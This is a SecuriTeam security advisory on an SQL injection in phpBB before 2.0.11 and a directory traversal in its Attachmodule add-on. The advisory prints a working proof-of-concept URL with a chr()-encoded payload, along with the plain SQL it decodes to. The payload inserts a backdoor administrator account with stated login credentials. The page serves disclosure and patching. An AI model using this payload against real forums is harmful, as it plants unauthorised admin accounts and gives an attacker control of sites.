SecuriTeam - phpBB SQL Injection and Attachmodule Add-On Directory Traversal

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

phpBB is "a high powered, fully scalable, and highly customizable open-source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites."

An SQL injection vulnerability and a directory traversal vulnerabilities exist within phpBB and Attach module's code.

Credit:
The information has been provided by Zeelock.

Website Security Scan	Code Vulnerability Test	Network Assessment Tool
Detect hidden vulnerabilities	Exhaustive automated testing	Real-time, continuous security
Get guidance from professionals	of internal or 3rd party code.	scanning for your entire network

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

Vulnerable Systems:
* phpBB versions prior to 2.0.11
* Attachmodule, all versions

Immune Systems:
* phpBB version 2.0.11

Due to decoding mishandling of the input request a malicious attacker is able to inject any type of SQL query to the back-end database server. Upon close inspection of the code is became evident that using multiple char() functions will fool phpBB and allow insertion of an SQL query.

The following SQL statement will add a user with administrative rights on the system:
INSERT INTO phpbb_users(user_id, user_active, username, user_password, user_level) VALUES ('99999', '1', 'ze3lock', 'ba3c83348bddf7b368b478ac06d3340e', '1')

And the following login credentials:
username: ze3lock
pass: thepass

Note: This query is assuming that the phpBB user table is called 'phpbb_users', which comprise most of the sites using phpBB. However, sites in which the table's name was changed will not be affected and the correct name of the table will have to be discovered before exploitation can take place.

The exploit can be run on any site using phpBB without the need to be registered. This makes it a prime target for automated scripts that insert backdoors in many sites around the web. A proof of concept HTTP query is provided below. In order to make it work, an active thread number from the forums must be substituted in, but this is relatively trivial to find.

http://site.com/forum/viewtopic.php?t=30&highlight=%2527%252emysql_query(chr(73)%252echr(78)
%252echr(83)%252echr(69)%252echr(82)%252echr(84)%252echr(32)%252echr(73)%252echr(78)
%252echr(84)%252echr(79)%252echr(32)%252echr(112)%252echr(104)%252echr(112)%252echr(98)
%252echr(98)%252echr(95)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(115)
%252echr(40)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(105)
%252echr(100)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)
%252echr(97)%252echr(99)%252echr(116)%252echr(105)%252echr(118)%252echr(101)%252echr(44)
%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(110)%252echr(97)%252echr(109)
%252echr(101)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)
%252echr(112)%252echr(97)%252echr(115)%252echr(115)%252echr(119)%252echr(111)%252echr(114)
%252echr(100)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)
%252echr(108)%252echr(101)%252echr(118)%252echr(101)%252echr(108)%252echr(41)%252echr(32)
%252echr(86)%252echr(65)%252echr(76)%252echr(85)%252echr(69)%252echr(83)%252echr(32)
%252echr(40)%252echr(39)%252echr(57)%252echr(57)%252echr(57)%252echr(57)%252echr(57)
%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(44)%252echr(39)
%252echr(122)%252echr(101)%252echr(51)%252echr(108)%252echr(111)%252echr(99)%252echr(107)
%252echr(39)%252echr(44)%252echr(39)%252echr(98)%252echr(97)%252echr(51)%252echr(99)
%252echr(56)%252echr(51)%252echr(51)%252echr(52)%252echr(56)%252echr(98)%252echr(100)
%252echr(100)%252echr(102)%252echr(55)%252echr(98)%252echr(51)%252echr(54)%252echr(56)
%252echr(98)%252echr(52)%252echr(55)%252echr(56)%252echr(97)%252echr(99)%252echr(48)
%252echr(54)%252echr(100)%252echr(51)%252echr(51)%252echr(52)%252echr(48)%252echr(101)
%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(41))%252e%2527

In addition, a directory traversal bug in the Attachmodule allows the user to read any file located on the local filesystem of the server running phpBB. The main culprit is the 'UPLOAD_DIR' argument which is not properly sanitized. This directory represents the directory in which all files should be uploaded to and the system accepts any type of character as input. An attacker is thus able to overwrite files on the local filesystem of the server.

Vendor Status:
Users of this system are highly encouraged to upgade to version 2.0.11 and add input validation to the 'UPLOAD_DIR' argument of Attachmodule.

	Mozilla Bugzilla Multiple Vulnerabilities
	RealNetworks RealPlayer 11 HTTP Chunked Encoding Vulnerability
	HP OpenVMS RMS Local Escalation of Privilege
	Asterisk T.38 Remote Crash Vulnerability
	HP-UX running HP CIFS Server Remote Unauthorized Access
	HP Enterprise Cluster Master Toolkit Local Unauthorized Access
	Apple Webkit Blink Event Dangling Pointer Remote Code Execution Vulnerability
	Microsoft Virtual PC Hypervisor Memory Protection Vulnerability
	Apple WebKit HTML Element Use After Free Vulnerability
	Apple WebKit CSS Run-in Attribute Rendering Vulnerability
	Publique! CMS and SQL Injection Vulnerabilities
	Files2Links F2L-3000 SQL Injection Vulnerability
	HP-UX Running Apache Data Injection and DoS Vulnerability
	MIT krb5 KDC denial of service in cross-realm referral processing
	AproxEngine Multiple Vulnerabilities